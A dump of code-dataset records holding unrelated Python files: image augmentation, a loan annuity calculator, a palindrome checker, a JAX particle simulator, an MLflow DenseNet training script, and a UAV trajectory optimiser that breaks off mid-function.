central crop\n central_fraction = float(output_height)/float(H)\n image = tf.image.central_crop(image, central_fraction)\n # random flip up and down, right and left.\n image = tf.image.random_flip_up_down(image)\n image = tf.image.random_flip_left_right(image)\n #randomly transpose the image\n if np.random.rand(1) > 0.5:\n image = tf.image.transpose_image(image)\n \n #rotate images by random number of 90 degree.\n k = np.random.randint(4, size=1)\n if k!=0:\n image = tf.image.rot90(image, k = k)\n \n #adjust random brightness a little bit.\n max_delta = 0.2\n image = tf.image.random_brightness(image, max_delta)\n \n # randomly perturbing the saturation.\n saturation_lower = 0.9\n saturation_upper = 1.1\n image = tf.image.random_saturation(image, lower, upper)\n return image\n\n\ndef preprocess_for_eval_single_image(image, output_height, output_width):\n \"\"\"Preprocesses a single image for evaluation.\n Args:\n image: A `Tensor` [height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A preprocessed 
image tensor [output_height, output_width, channels]\n \"\"\"\n rank_assertion = tf.Assert(\n tf.equal(tf.rank(image), 3),\n ['Rank of image must be equal to 3.'])\n assert output_height==output_width, 'output_height and output_width must be equal'\n H, W, C = image.get_shape()\n \n # central crop\n central_fraction = float(output_height)/float(H)\n image = tf.image.central_crop(image, central_fraction)\n \n return image\n\n\ndef preprocess_for_train(images, output_height, output_width):\n \n \"\"\"Preprocesses images for training.\n Args:\n images: A `Tensor` [batch_size, height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A preprocessed images tensor [batch_size, output_height, output_width, channels]\n \"\"\"\n N, _ ,_ , channels = images.get_shape()\n # tensors do not support item assignment, so collect and stack instead\n images_list = []\n for i in range(N):\n images_list.append(preprocess_for_train_single_image(images[i,:,:,:], output_height, output_width))\n images_processed = tf.stack(images_list)\n return images_processed\n\ndef preprocess_for_eval(images, output_height, output_width):\n \n \"\"\"Preprocesses images for evaluation.\n Args:\n images: A `Tensor` [batch_size, height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A preprocessed images tensor [batch_size, output_height, output_width, channels]\n \"\"\"\n N, _ ,_ , channels = images.get_shape()\n # tensors do not support item assignment, so collect and stack instead\n images_list = []\n for i in range(N):\n images_list.append(preprocess_for_eval_single_image(images[i,:,:,:], output_height, output_width))\n images_processed = tf.stack(images_list)\n return images_processed\n \n\ndef preprocess_images(images, output_height, output_width, is_training=False):\n \"\"\"Preprocesses the given image.\n Args:\n images: A `Tensor` [batch_size, height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n is_training: `True` if we're preprocessing the image for training and\n `False` otherwise.\n Returns:\n A preprocessed images tensor [batch_size, output_height, output_width, channels]\n \"\"\"\n if is_training:\n return preprocess_for_train(images, output_height, output_width)\n else:\n return preprocess_for_eval(images, output_height, output_width)\n\n","repo_name":"chaovite/cs231n-kaggle-amazon","sub_path":"models/image_prep_helpers.py","file_name":"image_prep_helpers.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
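# A minimal alternative sketch for the batched helpers above: since TensorFlow
# tensors do not support item assignment, tf.map_fn can apply the per-image
# function across the batch dimension directly. Only names defined in the file
# above are assumed.
import tensorflow as tf

def preprocess_for_eval_batched(images, output_height, output_width):
    # map the single-image eval preprocessing over the leading (batch) axis
    return tf.map_fn(
        lambda img: preprocess_for_eval_single_image(img, output_height, output_width),
        images,
    )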
+{"seq_id":"14530604393","text":"import math\nimport argparse\nimport sys\n\ncredit_principal = 'Credit principal: 1000'\nfinal_output = 'The credit has been repaid!'\nfirst_month = 'Month 1: paid out 250'\nsecond_month = 'Month 2: paid out 250'\nthird_month = 'Month 3: paid out 500'\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--type\", type=str, help=\"input type of calculation\")\n\ndef check_positive(value):\n ivalue = float(value)\n if ivalue <= 0:\n print(\"Incorrect parameters\")\n #sys.exit()\n return ivalue\n\n\nparser.add_argument(\"--principal\", type=check_positive, help=\"input value of credit principal\")\nparser.add_argument(\"--interest\", type=check_positive, help=\"input value of credit interest\")\nparser.add_argument(\"--periods\", type=check_positive, help=\"input count of periods\")\nparser.add_argument(\"--payment\", type=check_positive, help=\"input monthly payment\")\n\nargs = parser.parse_args()\n\nif args.interest:\n #ANNUITY\n if args.type == \"annuity\":\n if args.payment and args.principal and not args.periods:\n\n nominal_interest_rate = float((args.interest / 100) / (12 * 1))\n\n # calculations\n periods_calculation = (math.ceil(\n math.log((args.payment / (args.payment - nominal_interest_rate * args.principal)), (1 + nominal_interest_rate))))\n years = math.floor(periods_calculation / 12)\n months = periods_calculation % 12\n\n # count of period string formatting\n years_over_one = f\"year{'s' if years > 1 else ''}\"\n andicko = f\"{' and ' if years != 0 and months != 0 else ''}\"\n years_over_zero = f'{years} {years_over_one}{andicko}'\n years_final = f\"{years_over_zero if years > 0 else ''}\"\n\n months_over_one = f\"month{'s' if months > 1 else ''}\"\n months_over_zero = f'{months} {months_over_one}'\n months_final = f\"{months_over_zero if months > 0 else ''}\"\n\n # output\n periods_output = f\"You need {years_final}{months_final} to repay this credit!\"\n print(periods_output)\n print(\"Overpayment = {:.0f}\".format(args.payment * periods_calculation - args.principal))\n\n elif args.principal and args.periods and not args.payment:\n\n nominal_interest_rate = float((args.interest / 100) / (12 * 1))\n\n # calculations\n payment_calculation = math.ceil(args.principal * (\n (nominal_interest_rate * math.pow((1 + nominal_interest_rate), args.periods)) / (\n math.pow((1 + nominal_interest_rate), args.periods) - 1)))\n\n # output\n payment_output = (\"Your annuity payment = {:.0f}!\".format(payment_calculation))\n print(payment_output)\n print(\"Overpayment = {:.0f}\".format(payment_calculation * args.periods - args.principal))\n\n elif args.payment and args.periods and not args.principal:\n\n nominal_interest_rate = float((args.interest / 100) / (12 * 1))\n\n # calculations\n principal_calculation = int(args.payment / (\n (nominal_interest_rate * math.pow((1 + nominal_interest_rate), args.periods)) / (\n math.pow((1 + nominal_interest_rate), args.periods) - 1)))\n\n # output\n principal_output = f\"Your credit principal = {principal_calculation}!\"\n print(principal_output)\n print(\"Overpayment = {:.0f}\".format(args.payment * args.periods - principal_calculation))\n\n # DIFFERENTIATE\n elif args.type == \"diff\":\n if args.payment:\n print(\"Incorrect parameters\")\n elif args.principal and args.periods:\n\n nominal_interest_rate = float((args.interest / 100) / (12 * 1))\n\n current_period = 1\n paid = 0\n while current_period <= args.periods:\n diff_payment = math.ceil(args.principal/args.periods + nominal_interest_rate * 
(args.principal - (args.principal *\n (current_period - 1)) / args.periods))\n print(\"Month {}: paid out {:.0f}\".format(current_period, diff_payment))\n paid += diff_payment\n current_period += 1\n print(\"Overpayment = {:.0f}\".format(paid - args.principal))\n\n else:\n print(\"Incorrect parameters\")\nelse:\n print(\"Incorrect parameters\")\n\nprint(final_output)\n","repo_name":"simaskova/creditcalc","sub_path":"creditcalc.py","file_name":"creditcalc.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
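# A worked check of the annuity formula the calculator above uses,
# A = P * i(1+i)^n / ((1+i)^n - 1), with illustrative numbers (P = 1,000,000,
# 10% nominal annual interest, 60 monthly periods):
import math

P = 1_000_000
i = 0.10 / 12          # nominal monthly interest rate
n = 60                 # number of monthly payments
A = math.ceil(P * (i * math.pow(1 + i, n)) / (math.pow(1 + i, n) - 1))
print(A)               # 21248
print(A * n - P)       # overpayment: 274880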
+{"seq_id":"24776042546","text":"import string\n\ndef format_string(text):\n boolean_li = []\n text = text.lower().translate(str.maketrans('','',string.punctuation)).replace(' ','')\n j = len(text) - 1\n for i in range(int(len(text)/2)):\n if j >= 0:\n if text[i] == text[j]:\n boolean_li.append(True)\n j -= 1 \n \n\n if len(boolean_li) > 0:\n print(\"Word is a palindrome!\")\n else:\n print(\"Word is not a palindrome!\") \n\ndef main():\n text = input(\"Give word to check if it is a palindrome \")\n format_string(text)\n\nif __name__ == \"__main__\":\n main() \n \n#checks if user-given word is a palindrome after space and punctuation removal\n","repo_name":"Buffito/Exercises","sub_path":"check_palindrome.py","file_name":"check_palindrome.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"8331749754","text":"import diotima.world.physics as physics\n\nimport jax\nimport jax.numpy as jnp\nfrom jax._src.prng import PRNGKeyArray\nfrom jax import Array\n\nfrom typing import NamedTuple\nfrom collections import namedtuple\nfrom functools import partial\n\n\nclass UniverseConfig(NamedTuple):\n \"\"\"\n Object containing universe configuration details.\n \"\"\"\n\n n_elems: int\n n_atoms: int\n n_dims: int\n dt: float\n physics_config: Array\n elem_distrib: Array\n batch_size: int = 2\n\n\ndef default_universe_config():\n n_elems = 3\n\n return UniverseConfig(\n n_elems,\n n_atoms=4,\n n_dims=2,\n dt=0.1,\n physics_config=physics.default_physics_config(n_elems),\n elem_distrib=physics.default_elem_distrib(n_elems),\n )\n\n\nclass Universe(NamedTuple):\n \"\"\"\n Object holding universe state.\n \"\"\"\n\n atom_locs: Array\n atom_elems: Array\n locs_history: Array = None\n jac_history: Array = None\n step: int = 0\n\n\ndef seed(\n universe_config: UniverseConfig, key: PRNGKeyArray = jax.random.PRNGKey(0)\n) -> Universe:\n \"\"\"\n Seed universe (i.e. assign pseudorandom atom locations and elements).\n\n Args:\n universe_config: Universe configuration to use in seeding universe.\n key: PRNG key to use in determining atom locations and elements.\n\n Returns:\n Seeded universe object.\n \"\"\"\n # TODO: Unfix key\n key_locs, key_elems = jax.random.split(key, num=2)\n atom_locs = jax.random.normal(\n key_locs,\n shape=(universe_config.n_atoms, universe_config.n_dims),\n dtype=\"float32\",\n )\n atom_elems = physics.elem_distrib_to_elems(\n universe_config.n_atoms,\n universe_config.n_elems,\n universe_config.elem_distrib,\n key_elems,\n )\n\n return Universe(atom_locs, atom_elems)\n\n\ndef run(\n universe: Universe,\n universe_config: UniverseConfig,\n n_steps: int = 1,\n get_jac: bool = False,\n init_adv_opt=None,\n) -> Universe:\n \"\"\"\n Run universe `n_steps` forward.\n\n Args:\n universe: Starting universe to run forward.\n n_steps: Number of steps to run universe forward.\n get_jac: Whether to also compute the grad-based causal graph.\n\n Returns:\n Update universe object.\n \"\"\"\n\n def pure_step(state, _):\n snapshot, adv_opt = state\n new_snapshot = physics.step(\n snapshot.locs, universe.atom_elems, universe_config, get_jac\n )\n\n if adv_opt:\n key, subkey = jax.random.split(adv_opt.key, num=2)\n delta = (\n jax.random.normal(\n subkey,\n shape=(\n universe_config.n_atoms,\n universe_config.n_dims,\n ),\n dtype=\"float32\",\n )\n * 0\n # TODO: Add back adv opt.\n )\n new_snapshot = physics.Snapshot(new_snapshot.locs + delta, new_snapshot.jac)\n adv_opt = BrownianOptimizer(key)\n\n state = new_snapshot, adv_opt\n return state, state\n\n last_state, state_history = jax.lax.scan(\n pure_step,\n (\n physics.first_snapshot(universe.atom_locs, universe_config),\n init_adv_opt,\n ),\n None,\n n_steps,\n )\n last_state = last_state[0]\n state_history = state_history[0]\n\n if universe.locs_history is not None:\n updated_locs_history = jnp.concatenate(\n (universe.locs_history, state_history.locs)\n )\n updated_jac_history = jnp.concatenate((universe.jac_history, state_history.jac))\n else:\n updated_locs_history = state_history.locs\n updated_jac_history = state_history.jac\n\n return Universe(\n last_state.locs,\n universe.atom_elems,\n updated_locs_history,\n updated_jac_history,\n universe.step + n_steps,\n )\n\n\nclass BrownianOptimizer(NamedTuple):\n key: PRNGKeyArray\n\n\ndef spawn_counterfactuals(\n universe: Universe,\n universe_config: UniverseConfig,\n start: 
int,\n n_cfs: int,\n key: PRNGKeyArray = jax.random.PRNGKey(0),\n):\n \"\"\"\n Instantiate new universes based on specified one, by adversarially optimizing from `start` into `n_cfs` counterfactuals.\n \"\"\"\n assert start >= 0 and start < universe.step\n\n # Isolate common thread.\n common_thread = trim(universe, start)\n\n # Split into n_cfs keys.\n keys = jax.random.split(key, num=n_cfs)\n\n # Run universes forward using adversarial optimizers\n def spawn_counterfactual(key):\n return run(\n common_thread,\n universe_config,\n universe.step - start,\n False,\n BrownianOptimizer(key),\n )\n\n counterfactuals = jax.vmap(spawn_counterfactual)(keys)\n\n return counterfactuals\n\n\ndef trim(\n universe: Universe,\n until: int,\n):\n \"\"\"\n Given universe, return universe as if only until `until` timestep.\n \"\"\"\n assert until < universe.step\n\n return Universe(\n universe.locs_history[until - 1],\n universe.atom_elems,\n universe.locs_history[:until],\n universe.jac_history[:until],\n until,\n )\n","repo_name":"paulbricman/diotima","sub_path":"diotima/world/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
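# A self-contained toy sketch of the jax.lax.scan pattern `run` uses above:
# a pure step function is threaded through scan, which returns the final
# carry plus the stacked per-step history. The update rule here is a
# placeholder, not diotima's physics.step.
import jax
import jax.numpy as jnp

def toy_step(locs, _):
    new_locs = locs + 0.1 * jnp.sin(locs)  # placeholder dynamics
    return new_locs, new_locs              # (carry, per-step output)

locs0 = jnp.ones((4, 2))
final_locs, history = jax.lax.scan(toy_step, locs0, None, length=10)
print(history.shape)  # (10, 4, 2)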
+{"seq_id":"8604884185","text":"import os\nimport cv2 as cv\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.applications import DenseNet201\nfrom tensorflow.keras import layers, Model, optimizers\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.utils import to_categorical\nimport mlflow\nimport mlflow.keras\nimport keras.backend as K\nfrom keras.optimizers import Adam\nfrom sklearn.metrics import classification_report\n\nfrom sklearn.metrics import confusion_matrix\n\n# Set the MLflow experiment name\nmlflow.set_experiment(\"project\")\n\n# Set the root directory containing the data\nroot = \"/app/data/\"\n\n# Read the images and store them in arrays\nx = []\ny = []\nclassnames = os.listdir(root)\nfor clas in classnames:\n img_path = os.path.join(root, clas)\n class_num = classnames.index(clas)\n for image in os.listdir(img_path):\n try:\n ip = os.path.join(img_path, image)\n img_array = cv.imread(ip, cv.IMREAD_COLOR)\n n_array = cv.resize(img_array, (256, 192))\n x.append(n_array)\n y.append(class_num)\n except:\n pass\n\n# Split the data into training and validation sets\nx_train, x_val, y_train, y_val = train_test_split(\n x, y, random_state=104, test_size=0.45, shuffle=True\n)\nx_train = np.array(x_train)\ny_train = np.array(y_train)\nx_val = np.array(x_val)\ny_val = np.array(y_val)\n\n# Convert the labels to categorical\ny_train = to_categorical(y_train)\ny_val = to_categorical(y_val)\n\n# Define the model architecture\npre_trained_model = DenseNet201(\n input_shape=(192, 256, 3), include_top=False, weights=\"imagenet\"\n)\n\nfor layer in pre_trained_model.layers:\n print(layer.name)\n if hasattr(layer, \"moving_mean\") and hasattr(layer, \"moving_variance\"):\n layer.trainable = True\n K.eval(K.update(layer.moving_mean, K.zeros_like(layer.moving_mean)))\n K.eval(K.update(layer.moving_variance, K.zeros_like(layer.moving_variance)))\n else:\n layer.trainable = False\nlast_layer = pre_trained_model.get_layer(\"relu\")\nprint(\"last layer output shape:\", last_layer.output_shape)\nlast_output = last_layer.output\n\n# Compile the model\nx = layers.GlobalMaxPooling2D()(last_output)\nx = layers.Dense(512, activation=\"relu\")(x)\n\nx = layers.Dropout(0.5)(x)\n\nx = layers.Dense(9, activation=\"softmax\")(x)\n\n\nmodel = Model(pre_trained_model.input, x)\noptimizer = Adam(\n lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=True\n)\nmodel.compile(\n loss=\"categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"]\n)\n\n# Start the MLflow run\nwith mlflow.start_run():\n # Enable MLflow autologging\n mlflow.keras.autolog()\n\n # Train the model\n batch_size = 24\n epochs = 1\n history = model.fit(\n x=np.array(x_train),\n y=np.array(y_train),\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(np.array(x_val), np.array(y_val)),\n verbose=1,\n steps_per_epoch=(len(x_train) // batch_size),\n validation_steps=(len(x_val) // batch_size),\n callbacks=[ReduceLROnPlateau()],\n )\n\n # Save the model\n model.save(\"dense-net-finetuned\")\n\n # Log the model as an artifact\n mlflow.log_artifact(\"dense-net-finetuned\")\n\n # Evaluate the model\n # Evaluate the model\n loss_test, acc_test = model.evaluate(np.array(x_val), np.array(y_val), verbose=1)\n\n # Log metrics\n mlflow.log_metric(\"accuracy\", acc_test)\n mlflow.log_metric(\"loss\", loss_test)\n\n # Log the classification report\n 
y_pred = model.predict(np.array(x_val))\n y_pred_labels = np.argmax(y_pred, axis=1)\n y_true_labels = np.argmax(np.array(y_val), axis=1)\n\n # cm = confusion_matrix(y_true_labels, y_pred_labels)\n # cm_string = \"\\n\".join([str(row) for row in cm])\n # mlflow.log_metric(\"confusion_matrix\", cm_string)\n\n # # Calculate and log the classification report\n # clr = classification_report(y_true_labels, y_pred_labels, zero_division=1)\n # mlflow.log_metric(\"classification_report\", clr)\n\n# End the MLflow run\nmlflow.end_run()\n","repo_name":"farazamjad/FYP","sub_path":"Set_mlflow.py","file_name":"Set_mlflow.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
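# A hedged sketch of one way to log the commented-out classification report
# above: mlflow.log_metric accepts only numeric values, but recent MLflow
# versions can store free text as an artifact via mlflow.log_text, e.g.
#
#     clr = classification_report(y_true_labels, y_pred_labels, zero_division=1)
#     mlflow.log_text(clr, "classification_report.txt")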
+{"seq_id":"35141379015","text":"import datetime\n#import pytz\n\nimport numpy as np \nimport random \nimport math\nimport networkx as nx\nimport mosek.fusion as mf\nimport sys\nimport time\nimport os\n\nimport utils\nimport vis\n\n#date = datetime.datetime.now()\n#time_str = date.strftime(\"[%m-%d][%H%M]\")\n\nclass ma_sca():\n def __init__(self, K, M, GT, B, F, v_max=0.2, h_min=0.2, graph_max_edge_dist=0.5, Q=None, P=None, plotter=None):\n\n #init shen params\n self.d = np.zeros((K, K, M))\n self.I = np.zeros((K, M))\n self.gt = GT\n self.gamma = 10**11 / B\n self.eps = 0.01 #itr tolerance\n self.B = B\n self.F = F\n\n if Q is not None:\n self.q = Q\n else:\n self.q = np.zeros((K, M, 2))\n\n if P is not None:\n self.p = P\n else:\n self.p = np.zeros((K, M))\n\n if plotter is not None:\n self.plotter = plotter\n\n '''\n for k in range(K):\n print(\"\\\\addplot[color=blue,mark=o] coordinates{\", end='')\n for n in range(M):\n print(\"(%.2f,%.2f)\" % (self.q[k][n][0], self.q[k][n][1]), end='')\n print(\"};\")\n print()\n '''\n\n '''\n for k in range(K):\n print(\"\\\\addplot[color=red,mark=o] coordinates{\", end='')\n for n in range(M):\n print(\"(%d,%.2f)\" % (n, 10 * math.log(self.p[k][n], 10)), end='')\n print(\"};\")\n print()\n '''\n\n self.a = abs(np.sqrt(self.p))\n\n #init graph for coloring based on UAV trajectory ending locations\n self.g_gt = nx.Graph()\n\n self.v_max = v_max\n self.h_min = h_min\n \n date = datetime.datetime.now()\n self.time_str = date.strftime(\"[%m-%d][%H%M]\")\n self.params_str = \"[%df_%dk_%dm_%dv]\" % (len(self.F), K, M, int(self.v_max))\n\n #visualize initial trajectory\n self.plotter.plot_traj(self.q, self.gt)\n\n #update graph based on trajectory endpoints\n self.max_color_dist = graph_max_edge_dist\n self.update_graph(self.q[:,M - 1,:])\n self.f = self.color_graph(self.F)\n\n #self.f = self.naive_freq(2.484)\n\n print('[sca] init complete: K: %d M: %d eps: %f F: %s' % (K, M, self.eps, self.F))\n\n #determine initial d, I, R given p, q, f\n for f in self.f:\n uav_idxs = self.f[f]\n\n for n in range(M):\n for k in uav_idxs:\n self.a[k][n] = abs(math.sqrt(self.p[k][n]))\n\n self.I[k][n] = 0\n for j in uav_idxs:\n self.d[j][k][n] = utils.dist2(self.q[j][n], self.gt[k], self.h_min)**2\n self.I[k][n] += self.gamma * self.a[j][n]**2 / self.d[j][k][n]\n self.I[k][n] -= self.gamma * self.a[k][n]**2 / self.d[k][k][n]\n\n self.rate = utils.calc_rates(self.a, self.q, self.f, self.d, self.I, self.gt, self.gamma)\n self.rate = np.multiply(self.rate, self.B)\n\n\n \n if not os.path.exists(\"data/%s%s\" % (self.time_str, self.params_str)):\n os.makedirs(\"data/%s%s\" % (self.time_str, self.params_str))\n\n with open(\"data/%s%s/r_total_init.txt\" % (self.time_str, self.params_str), 'w+') as file:\n file.write(\"t r\\n\")\n for n in range(M):\n file.write(\"%d %.2f\\n\" % (n, np.sum(self.rate, axis=0)[n] / 10**6))\n\n self.rate = np.sum(self.rate)\n print(\"[sca] init R: %f\" % (self.rate))\n \n\n def sca(self):\n K, M = self.a.shape\n eps = 0.00001\n\n while True:\n t_start = time.time()\n #split sca into smaller shen optimizations\n for f in self.f:\n\n #print(f, self.f)\n\n print(\"[sca] F: %.3f\" % (f))\n uav_idxs = self.f[f]\n\n if len(uav_idxs) == 0:\n continue\n\n itr = 0\n while True:\n\n #num_uavs = len(uav_idxs)\n #idx_convert = []\n\n a_f, q_f, p_f, d_f, I_f, gt_f = slice_freq(uav_idxs, self.a, self.q, self.p, self.d, self.I, self.gt)\n var_a, var_q, obj_val = optimize_shen(a_f, q_f, p_f, d_f, I_f, gt_f, self.gamma, self.v_max, self.h_min)\n \n for idx in 
range(len(uav_idxs)):\n for n in range(M):\n obj_val = obj_val - math.log(1 + I_f[idx][n], 2) + I_f[idx][n] / (1 + I_f[idx][n])\n #unpack a, q from optimizer\n a_temp = np.zeros((len(uav_idxs), M))\n p_temp = np.zeros((len(uav_idxs), M))\n q_temp = np.zeros((len(uav_idxs), M, 2))\n\n for idx in range(len(uav_idxs) * M):\n a_temp[idx // M][idx % M] = var_a.level()[idx]\n p_temp[idx // M][idx % M] = a_temp[idx // M][idx % M]**2\n\n q_temp[idx // M][idx % M][0] = var_q.level()[idx * 2]\n q_temp[idx // M][idx % M][1] = var_q.level()[idx * 2 + 1]\n\n self.a[uav_idxs] = a_temp\n self.p[uav_idxs] = p_temp\n self.q[uav_idxs] = q_temp\n\n #update d, I\n for n in range(M):\n for k in uav_idxs:\n self.a[k][n] = abs(math.sqrt(self.p[k][n]))\n\n self.I[k][n] = 0\n for j in uav_idxs:\n self.d[j][k][n] = utils.dist2(self.q[j][n], self.gt[k], self.h_min)**2\n self.I[k][n] += self.gamma * self.a[j][n]**2 / self.d[j][k][n]\n self.I[k][n] -= self.gamma * self.a[k][n]**2 / self.d[k][k][n]\n\n #update R by eq 4 using shen_rpq\n rate_new = utils.calc_rates(self.a, self.q, self.f, self.d, self.I, self.gt, self.gamma)\n rate_new = np.multiply(rate_new, self.B)\n rate_total = np.sum(rate_new)\n\n #print(\"[sca] R: %.2f opt: %.2f\" % (rate_new, obj_val))\n \n #visualize and print\n self.plotter.plot_traj(self.q, self.gt)\n\n #termination condition\n if (rate_total - self.rate) / (self.rate) < eps:\n #self.rate = rate_new\n #print(\"[sca] R: %f opt: %f\" % (self.rate, obj_val))\n break\n\n #update iteration\n self.rate = rate_total\n\n itr += 1\n if itr % 5 == 0:\n pass\n \n print(\"[sca] time: %.2f\" % (time.time() - t_start))\n for k in range(K):\n print(\"[sca] uav: %d p: %.4f q: [%.2f %.2f]\" % (k, self.p[k][M-1], self.q[k][M-1][0], self.q[k][M-1][1]))\n print(\"[sca] R: %f --------------------\" % (rate_total))\n #print()\n\n #update freq graph based on trajectory endpoints\n self.update_graph(self.q[:,M - 1,:])\n f_new = self.color_graph(self.F)\n if self.f == f_new:\n print(\"[sca] finished\")\n print(\"[sca] R: %f\" % (self.rate))\n break\n self.f = f_new\n \n #update d, I\n for f in self.f:\n uav_idxs = self.f[f]\n\n for n in range(M):\n for k in uav_idxs:\n self.a[k][n] = abs(math.sqrt(self.p[k][n]))\n\n self.I[k][n] = 0\n for j in uav_idxs:\n self.d[j][k][n] = utils.dist2(self.q[j][n], self.gt[k], self.h_min)**2\n self.I[k][n] += self.gamma * self.a[j][n]**2 / self.d[j][k][n]\n self.I[k][n] -= self.gamma * self.a[k][n]**2 / self.d[k][k][n]\n\n #print ending diagnostics\n rate_final = utils.calc_rates(self.a, self.q, self.f, self.d, self.I, self.gt, self.gamma)\n rate_final = np.multiply(rate_final, self.B)\n rate_total_final = np.sum(rate_final)\n print(\"[sca] R FINAL: %f --------------------\" % (rate_total_final)) \n\n if not os.path.exists(\"data/%s%s\" % (self.time_str, self.params_str)):\n os.makedirs(\"data/%s%s\" % (self.time_str, self.params_str))\n\n print(\"[sca] writing output to data/%s%s/\" % (self.time_str, self.params_str))\n\n print(\"[sca] writing GT FINAL:\")\n with open(\"data/%s%s/gt.txt\" % (self.time_str, self.params_str), 'w+') as file:\n file.write(\"x y\\n\")\n for k in range(K):\n file.write(\"%.2f %.2f\\n\" % (self.gt[k][0], self.gt[k][1]))\n\n for k in range(K):\n print(\"[sca] writing P final:\")\n with open(\"data/%s%s/uav%d_p.txt\" % (self.time_str, self.params_str, k), 'w+') as file:\n file.write(\"t p\\n\")\n for n in range(M):\n file.write(\"%d %.2f\\n\" % (n, 10 * math.log(self.p[k][n], 10)))\n\n \n for k in range(K):\n print(\"[sca] writing Q FINAL:\")\n with 
open(\"data/%s%s/uav%d_q.txt\" % (self.time_str, self.params_str, k), 'w+') as file:\n file.write(\"x y\\n\")\n freq = -1\n for f in self.f:\n if k in self.f[f]:\n freq = f\n \n for n in range(M):\n file.write(\"%.2f %.2f %f\\n\" % (self.q[k][n][0], self.q[k][n][1], freq))\n\n with open(\"data/%s%s/r_total.txt\" % (self.time_str, self.params_str), 'w+') as file:\n file.write(\"t r\\n\")\n for n in range(M):\n file.write(\"%d %.2f\\n\" % (n, np.sum(rate_final, axis=0)[n] / 10**6))\n\n for k in range(K):\n print(\"[sca] writing R FINAL:\")\n with open(\"data/%s%s/uav%d_r.txt\" % (self.time_str, self.params_str, k), 'w+') as file:\n file.write(\"t r\\n\")\n\n for n in range(M):\n file.write(\"%d %.2f\\n\" % (n, rate_final[k][n] / 10**6))\n\n #for f in self.f:\n # pass\n\n self.p = np.multiply(self.a, self.a)\n time.sleep(10)\n return self.p, self.q\n\n #update graph given new set of target positions\n def update_graph(self, target_pos):\n #print(\"update_graph: \\n\", target_pos)\n t_start = time.time()\n\n self.g_gt.clear()\n\n for i in range(len(target_pos)):\n self.g_gt.add_node(i, p=target_pos[i])\n \n for v1 in self.g_gt:\n pos1 = self.g_gt.nodes[v1]['p']\n for v2 in self.g_gt:\n pos2 = self.g_gt.nodes[v2]['p']\n \n if v1 == v2 or self.g_gt.has_edge(v1, v2):\n continue\n \n #nodes are close enough that they should be assigned sep freqs if possible\n if utils.dist(pos1, pos2) <= self.max_color_dist:\n self.g_gt.add_edge(v1, v2, weight=utils.dist(pos1, pos2))\n \n t_end = time.time()\n #print(\"[upd graph] time:\", t_end - t_start)\n\n def color_graph(self, F):\n\n t_start = time.time()\n\n F = list(sorted(F, reverse=True))\n #print(\"[color] freqs:\", F)\n\n range_factor = 20000.0\n\n #freq assignments f\n f = [0]\n\n while 0 in f:\n #reinit everything\n g = self.g_gt.copy()\n max_vert_idx = len(g.nodes())\n\n g_freqs = []\n\n #print(\"[color] range factor:\", range_factor)\n\n f = [0 for i in range(g.number_of_nodes())]\n\n #starting from highest freq, max freq reuse\n for curr_freq in F:\n #determine max dist threshold for current freq\n dist_thresh = range_factor / curr_freq**2\n\n #fetch full graph state\n edges = g.edges(data=\"weight\")\n edges = list(sorted(edges, key=lambda x: x[2]))\n #edges = list(sorted(edges, reverse=True, key=lambda x: x[2]))\n verts = g.nodes()\n\n #print(edges)\n #print(verts)\n\n '''\n #remove edges with larger weight than threshold\n while edge_ptr < len(edges) and edges[edge_ptr][2] > dist_thresh:\n g.remove_edge(edges[edge_ptr][0], edges[edge_ptr][1])\n edge_ptr += 1\n '''\n\n #create a copy of graph for use on this freq\n g_freq = g.copy()\n\n #remove edges for other freqs\n for edge in edges:\n if edge[2] > dist_thresh:\n g_freq.remove_edge(edge[0], edge[1])\n g_freqs.append(g_freq)\n\n #find connected components in graph\n visited = [0 for x in range(max_vert_idx)]\n cc_id = []\n curr_id = 0\n\n #print(verts)\n\n for v in verts:\n #if not g.has_node(v):\n # continue\n\n #if previously unvisited, recursively visit\n num_visited = visit_node(g_freq, v, visited, cc_id, curr_id)\n\n if num_visited > 0:\n curr_id += 1\n \n #print(cc_id)\n #for each cc, assign vert with lowest degree the current freq\n for cc in cc_id:\n g_sub = g_freq.copy()\n\n while len(cc) > 0:\n lowest_degree = 1000\n lowest_vertex = -1\n for v in cc:\n if g_sub.degree(v) < lowest_degree:\n lowest_degree = g_sub.degree(v)\n lowest_vertex = v\n\n if lowest_vertex != -1:\n f[lowest_vertex] = curr_freq\n\n #remove the vertex's neighbors from consideration for this freq\n neighbors = 
